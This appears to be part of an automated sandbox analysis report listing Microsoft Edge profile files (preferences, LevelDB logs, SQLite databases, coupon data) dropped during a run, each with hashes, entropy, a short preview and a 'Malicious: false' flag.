Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366491012335708","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\91570202-b28b-4a9e-9109-76aaf5e668dc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40504
Entropy (8bit):	5.560910003233341
Encrypted:	false
SSDEEP:	768:rbD1/N7pLGLvuEWP+Mf/58F1+UoAYDCx9Tuqh0VfUC9xbog/OVyY3YzRmrwp6jO4:rbD1/7cvuEWP+Mf/5u1jaLY34Rjp6jdv
MD5:	65EEA430946123D0C703AF659237314B
SHA1:	0956F6AC26DBA19973A2C8D3D7BBC4260DA7CB79
SHA-256:	95CE830C9008B69F76930D72A3E7EEDEBBFCA071EC8CD13C368841E5C4BD719A
SHA-512:	FA31F4CB11835E2B07E9E0E96EAE0A6936D733489CEC20DC20CA879B9D0A9D511107A4636C17C2F4A4973D7A96F44B64B046B70707649BBA1FAC56A136E649E9
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366491011613564","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366491011613564","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	307
Entropy (8bit):	5.278246064400045
Encrypted:	false
SSDEEP:	6:BMyi0WGR1923oH+Tcwtp3hBtB2KLlrMyXWiHb1L+q2P923oH+Tcwtp3hBWsIFUv:3H6Yebp3dFL/XWs9+v4Yebp3eFUv
MD5:	158F1E67C2671F53C2DA4DDC49839B66
SHA1:	98B566A26E78CC317223709308FCB95E5A0BB5CE
SHA-256:	B32C5DC398EB10C23BA9522627FE6B290832A576A7A4FF9DD90980A671EE7096
SHA-512:	75EE079BFB3D4D9665A018682CB78EF681DC39E96A8455591BAF8DF6AE0045BF2A342226B6CFE284D93701F198FFEDA64327402618524DC0FD1C48BF97688687
Malicious:	false
Preview:	2024/07/26-14:10:18.955 b3c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/07/26-14:10:23.036 b3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	2163821
Entropy (8bit):	5.2228616406327255
Encrypted:	false
SSDEEP:	24576:v+/PN8FbfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8dfx2mjF
MD5:	6C3FAA8E3A39E0F3617238DFAFF1D15A
SHA1:	51621066F58097786EB49D24E9BB73C3A99993D8
SHA-256:	A146DE87457B521BC319A0F74E8E05669E0816DD61E2799E0CC41A001B02175A
SHA-512:	ADB99C4358085460376E65052B009498B84577E0CD5C63A6E65FED01EE84B1E494771B6AD371ACD578CD7477091341053E45198364C8050DBCAF54360DEB030F
Malicious:	false
Preview:	...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4...13340900604462938.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.097238714562834
Encrypted:	false
SSDEEP:	6:BMyXb6R+q2P923oH+Tcwt9Eh1tIFUt84MyXb4uAWZmw+4MyXbi8VkwO923oH+Tcf:3Xc+v4Yeb9Eh16FUt8iX7AW/+iXVV5Lw
MD5:	247CF9F6F986E0739401441FD885B372
SHA1:	61F334545E1F08869F24E8AE0F75C98B70BC2ED4
SHA-256:	2D0E11DEDE10124023BAE25F5948D3AF3506A851A94445651EC24FEEEECA0A3B
SHA-512:	4499C3C69620076807E93C6B6AAE194D9EE29E2F0F7B0A6166386D4CAF065772DBEE93DBF7362CB9527A5B3E61D2513894AB291CE8AA70DEC19A9590AD02341E
Malicious:	false
Preview:	2024/07/26-14:10:22.400 233c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/07/26-14:10:22.401 233c Recovering log #3.2024/07/26-14:10:22.748 233c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.097238714562834
Encrypted:	false
SSDEEP:	6:BMyXb6R+q2P923oH+Tcwt9Eh1tIFUt84MyXb4uAWZmw+4MyXbi8VkwO923oH+Tcf:3Xc+v4Yeb9Eh16FUt8iX7AW/+iXVV5Lw
MD5:	247CF9F6F986E0739401441FD885B372
SHA1:	61F334545E1F08869F24E8AE0F75C98B70BC2ED4
SHA-256:	2D0E11DEDE10124023BAE25F5948D3AF3506A851A94445651EC24FEEEECA0A3B
SHA-512:	4499C3C69620076807E93C6B6AAE194D9EE29E2F0F7B0A6166386D4CAF065772DBEE93DBF7362CB9527A5B3E61D2513894AB291CE8AA70DEC19A9590AD02341E
Malicious:	false
Preview:	2024/07/26-14:10:22.400 233c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/07/26-14:10:22.401 233c Recovering log #3.2024/07/26-14:10:22.748 233c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4669975638679728
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBr2:TouQq3qh7z3bY2LNW9WMcUvB
MD5:	D017C99533E4C63B1B756F25FEC8BC28
SHA1:	A8EA851D5D882BF825299BA7560C6C8D0A0ABB5D
SHA-256:	522202C399FA5AFB7B4BDD20F5EEB47E466927B80F8B45212117F13EA47A58FA
SHA-512:	2D4C2F1B073A0ECD2445ADA81472367C85FC20E00AF40114FD50C3D5CD786E533BC0CF2B124FCA1F5D37CBE1492DB05B7FEC8FC6DDF5897D1E74A83A17E916EA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	854587
Entropy (8bit):	6.011119224202052
Encrypted:	false
SSDEEP:	12288:8e/LHQ7MR98fWrOCgTW6nKmhuEZjjayCalEJ1uUnMHj0RyytqzwRJqJ8T9b:/HQILuWrXSbKuNZ/amEnuoTN3O8h
MD5:	D89F43EC653BCB9B6ADFBFFBA807024B
SHA1:	39524AA46ECCCD2A390CC5CE5EA1D38CE6913BD0
SHA-256:	E247035347AE85D1F8EA4517795FB6DDF96D9664009BD2F00AF064AE3B0B6E20
SHA-512:	69492B58DB4C3329D8068979829B84EEAEC6DD5DF939AF770E356702251667B59739C85CE941C6FC162CCB830021472604E1AF322732C46956CDF2AA7E60CAAD
Malicious:	false
Preview:	...m.................DB_VERSION.1..N).................BLOOM_FILTER:..4{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":5075849,"primeBases":[5381,5381,5381,5381],"supportedDomains":"xmdQDC+v7rL0SqbYRTLiDU2hmBNul4Cpgslr4CHeiAQEmzqbPw/NYuCHYCjpz2yaz50qgNUAFGhbYIg0Qw7WqSdN2FFsbSodtKb2xRKESMr+1rh2Sv97YNU/AsLETasUkRtOJpYp6Wpx/+CPNUSp1rx6dUmQTRC9+9IJgWbUIiRoTbPMyse76DaN25FEk7W+Hk1m3yH4Y3iIeiRxgUJU6DtqTQ3QMxwy4TY+Rr7Xa7ltG4EiOcAmaX8uKJfn+FBJNKLtCRORSg7Y4467LoXiZ9yshfBCKPLhHhYpiDNaLuidZwQhgd8LpPiDsEB/O7UUcvAwC6QFcwK9FRgPnWDxzC1fudl90b8xLirCwkxbkQD4vek9/xNn/PUFGyLBDDc8eK5k529mPTPm7qSPswV+2G0qFTeeLE+9mrp2zz3ZKlBdc3B1XBa0Ui5DkJmC9zpqZ2mdP43x9Rz2zQWxEqESqswV3YikXttibGwTv39vCOJriWkoONjE8TKd/+22vlN6sfPtnCDCFDF4xSuat1uYppjT78fSO66w5lCXNnr1mkEIAFPwNCWkSNT+DabRIK+MhwT8w6gwU9QGnRHbqjO7oHrlADjy01DSLIOdJiR3AxwUahGJw2elmPzzWIjQ7wBsDHW/QO99WlIWGALGNzOSEBY5iZHubhuLN8N/2seLXvgtoVGrOWEDAVG0G4zRUcFbfXehdhMjd1n4JFTswxrehJL+pgBpKpm+Fys7yNX8PCgwymuZB0soVQ9DEB5NxX++ffal8R3U3uSRUC1h4ZNFBJx1KpS08jokS1h

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000004.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	142
Entropy (8bit):	4.993794726477876
Encrypted:	false
SSDEEP:	3:Snmlt38E28xp4m3rscUSXXFVgYA0kJtlf+nETPxpK2x7LuX4XJ8X9Rumbn:Smlt38D8xSEsIXXrA04+n0PxEWA4XJG7
MD5:	7A13510BDE4566D22274B3AD066D7C10
SHA1:	AE9D8C892937AB9ADB6E05FF840554928463300F
SHA-256:	89077866586B03DD3B21505F3917BB2B8FD5853131344406220893B54066F11D
SHA-512:	F8F6B07B6FC52DEDDAF12A6BDB397AC678BA397E27F1D760D61870E8515AEDF665EC9FE7ADA53DD3C5705EBA45813A985EF53D5D145909FAC936F4F81EBDB828
Malicious:	false
Preview:	...n9................BLOOM_FILTER_EXPIRY_TIME:.1722103820.161185....G................BLOOM_FILTER_LAST_MODIFIED:.Fri, 26 Jul 2024 16:11:52 GMT

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	854513
Entropy (8bit):	6.009922036312578
Encrypted:	false
SSDEEP:	12288:lB/FH17K898fDrO84TW6nXmhZEZjjTyCvlEW1ujnfHj8SyytqSYRJqyVTmp:NH1OguDrvaNXuaZ/T7EAuDfN2HVK
MD5:	B4A12D4C69223DC41D3B7803EFBA2D4A
SHA1:	CB902E18064A9DDE28D20350910C6397E9F8BB55
SHA-256:	FE9E5B2E2778FD77E79F90C0B95B10F4B758F87AB05A0C97A96E9A5EA664E14A
SHA-512:	3225F0234BF9780D549108E65C8A1B2D7D467C01093348053B9E06D0B86542A08C17EF1DE698147222DFEA5373E4827D83768059B90921A5CB599C122EC46F1B
Malicious:	false
Preview:	....4BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":5075849,"primeBases":[5381,5381,5381,5381],"supportedDomains":"xmdQDC+v7rL0SqbYRTLiDU2hmBNul4Cpgslr4CHeiAQEmzqbPw/NYuCHYCjpz2yaz50qgNUAFGhbYIg0Qw7WqSdN2FFsbSodtKb2xRKESMr+1rh2Sv97YNU/AsLETasUkRtOJpYp6Wpx/+CPNUSp1rx6dUmQTRC9+9IJgWbUIiRoTbPMyse76DaN25FEk7W+Hk1m3yH4Y3iIeiRxgUJU6DtqTQ3QMxwy4TY+Rr7Xa7ltG4EiOcAmaX8uKJfn+FBJNKLtCRORSg7Y4467LoXiZ9yshfBCKPLhHhYpiDNaLuidZwQhgd8LpPiDsEB/O7UUcvAwC6QFcwK9FRgPnWDxzC1fudl90b8xLirCwkxbkQD4vek9/xNn/PUFGyLBDDc8eK5k529mPTPm7qSPswV+2G0qFTeeLE+9mrp2zz3ZKlBdc3B1XBa0Ui5DkJmC9zpqZ2mdP43x9Rz2zQWxEqESqswV3YikXttibGwTv39vCOJriWkoONjE8TKd/+22vlN6sfPtnCDCFDF4xSuat1uYppjT78fSO66w5lCXNnr1mkEIAFPwNCWkSNT+DabRIK+MhwT8w6gwU9QGnRHbqjO7oHrlADjy01DSLIOdJiR3AxwUahGJw2elmPzzWIjQ7wBsDHW/QO99WlIWGALGNzOSEBY5iZHubhuLN8N/2seLXvgtoVGrOWEDAVG0G4zRUcFbfXehdhMjd1n4JFTswxrehJL+pgBpKpm+Fys7yNX8PCgwymuZB0soVQ9DEB5NxX++ffal8R3U3uSRUC1h4ZNFBJx1KpS08jokS1hm6TTEEmXB2D9nf+Ng4y9lDv79v44X6LUFdYgHvhTk7Vz

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.253227719454698
Encrypted:	false
SSDEEP:	12:3Lv4Yebn9GFUt8il/+i35LYebn95Z9lXhSf0/Xh+hfn59HoKiXhyh:3L4Yeb9ig8iFpLYeb9znh/GAIh
MD5:	882CE10C2A9C52416AC23E5A3C684541
SHA1:	E6DD45AF9789BD244C27787B643823AEC467472E
SHA-256:	3768A3DAAFE1335430AC11A7B16239772FA4996D3E5FE4088CC7EFA4F4E6A9A0
SHA-512:	86A4851E3A2C0D3F021290C870016DC82999B19C031C05EFE026941048F1C759CD715A579D57495B6EBF6087FF4869F425F4EDB548278931AFDF7FCFE37E1C17
Malicious:	false
Preview:	2024/07/26-14:10:11.698 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/07/26-14:10:11.699 14e8 Recovering log #3.2024/07/26-14:10:11.699 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/07/26-14:10:20.356 1834 Level-0 table #5: started.2024/07/26-14:10:20.868 1834 Level-0 table #5: 854513 bytes OK.2024/07/26-14:10:20.870 1834 Delete type=0 #3.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.253227719454698
Encrypted:	false
SSDEEP:	12:3Lv4Yebn9GFUt8il/+i35LYebn95Z9lXhSf0/Xh+hfn59HoKiXhyh:3L4Yeb9ig8iFpLYeb9znh/GAIh
MD5:	882CE10C2A9C52416AC23E5A3C684541
SHA1:	E6DD45AF9789BD244C27787B643823AEC467472E
SHA-256:	3768A3DAAFE1335430AC11A7B16239772FA4996D3E5FE4088CC7EFA4F4E6A9A0
SHA-512:	86A4851E3A2C0D3F021290C870016DC82999B19C031C05EFE026941048F1C759CD715A579D57495B6EBF6087FF4869F425F4EDB548278931AFDF7FCFE37E1C17
Malicious:	false
Preview:	2024/07/26-14:10:11.698 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/07/26-14:10:11.699 14e8 Recovering log #3.2024/07/26-14:10:11.699 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/07/26-14:10:20.356 1834 Level-0 table #5: started.2024/07/26-14:10:20.868 1834 Level-0 table #5: 854513 bytes OK.2024/07/26-14:10:20.870 1834 Delete type=0 #3.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	103
Entropy (8bit):	5.248480538985684
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjKzhFhinEwETxFxN3erkEtl:scoBY7jshGEhTxFDkHl
MD5:	61DEA370DCFA9B813E4C4374E6501BA8
SHA1:	8B6C7ED4C738A1F4596B14BF60E56A289676092D
SHA-256:	6ACD783EB3A0EFE65C8DB8E5118FA2E01FA16CCA8A7ACC8D334B4DEB725A967D
SHA-512:	3E9FB9D49EA47CB3432411A0E8F5B91EE4C63FE6C831143AAB13370FFDA968C2F3C6E861398296DD92CB5AD21EAE314594304708B6FB2DFEC1FE47AB0DDC8173
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......D9.c7..............4.BLOOM_FILTER:.........DB_VERSION........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6135799880348319
Encrypted:	false
SSDEEP:	24:TLapR+DDNzWjJ0npnyXKUO8+jWMd0pMMFXmL:TO8D4jJ/6Up+z
MD5:	F7CA81CD28077EB04E31C0654E9A7B0A
SHA1:	E5096CE5495EC3C687262E7914BE870563711E14
SHA-256:	E4C323C962EB22F4695AAC92711DCE32A81ACA38DE27A2D2432E653576ACEB75
SHA-512:	B1A653C29AAC019633AAA2B0239200212591488A46E0CD1B271E3A43B85A239E2FC582709B0215DC0AC947D4946136B4C427DF6E56C644ED0DAFF2A8EFF0B954
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	392512
Entropy (8bit):	5.408408513168847
Encrypted:	false
SSDEEP:	6144:+z/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPZ:+kdMyq49tEndBuHltBfdK5WNbsVEziP2
MD5:	F7CE3BDDEBAC0D3620695F8C64D41941
SHA1:	868CEBDA2F9D7DE08186C411DC5F1C8E34F1A395
SHA-256:	ECF7ABB8E624E2ADE86A7D1AB549B4AE489F560CC0C81DBA853735BBE5C4CE12
SHA-512:	532E0E72C110C5B559344FA4600E745B9580932FFCB24D59350F77870362A3EBC6F0051D88B1B062FE15506E7BF1D7F6DF3D0F936DE0EEB1A2EB8B025C30CEA9
Malicious:	false
Preview:	...m.................DB_VERSION.1..<.q...............&QUERY_TIMESTAMP:domains_config_gz2...13366491023443363..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":75},"hash":"EwG2gkfquexLj6u3yjHyiL4YQwdU318k1Hub+1rSDMI=","size":391864}]Q"j%`~...............ASSET_VERSION:domains_config_gz.2.8.75..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	311
Entropy (8bit):	5.146516427255307
Encrypted:	false
